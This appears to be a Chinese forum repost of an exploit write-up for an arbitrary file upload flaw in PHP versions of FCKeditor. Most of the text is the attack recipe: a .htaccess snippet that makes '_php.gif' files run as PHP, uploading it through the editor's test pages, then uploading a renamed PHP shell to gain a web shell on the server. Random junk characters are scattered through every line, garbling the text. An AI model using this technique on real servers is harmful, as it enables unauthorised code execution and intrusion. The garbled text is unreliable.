FCKeditor所有php版本Upload上传漏洞5 _/ j7 {/ W1 w" ~6 r$ t5 |5 x e
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
: C% l- }9 l# I: H+ k7 l/ p减小字体 增大字体# n7 F$ F! c h( I8 p% k/ }
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
9 q4 t) Q$ S' S F, L N% _' }- Y[+] Date: 2011
3 {. Y( L7 |) M3 _% d[+] Author : sinesafe.cn
1 L8 }! h, f% M) s: ~6 e[+] Website : WwW.sinesafe.cn
: G" }3 P @" l- m———————————————————
7 t- F/ v7 P4 r3 |* F1.create a htaccess file:
8 {' c( ^5 U6 c- ^) Kcode:
o- u+ R# N! M<FilesMatch “_php.gif”>1 Q. x* e& t( p! n' J4 q
SetHandler application/x-httpd-php+ l+ q; E( p$ L9 a* F
</FilesMatch>
. }7 @9 d* C$ S2 }+ v. l
Q5 _$ @8 x7 j9 A2.Now upload this htaccess with FCKeditor.9 `1 |+ y, z1 H% u' ]" _
* F% V5 w3 F Hhttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html1 y8 j9 f% b: a/ L7 o
) W9 k2 }% U( @ m& D# b/ f$ Y1 B
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html! Z6 Z5 K' r3 l( e& y
3 u, k% f' i6 M/ c! C( F$ y7 ?———————————————————————————————-
! B6 r r" X5 C8 n3.Now upload shell.php.gif with FCKeditor.
/ k. ^) a8 s: g8 C: u4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
R& o$ O+ B0 Z ?# ?/ W5.http://www.sinesafe.cn/anything/shell_php.gif
7 L; a6 F- f/ R6 G. i6.Now shell is available from server. |
! I9 s: ?2 F# J7 |# h) U' @8 M
4 r. i6 E+ L5 d: D. E& s8 X
* x2 q& n7 P2 K g |
发表于 2013-10-27 17:25:21
收藏
支持
反对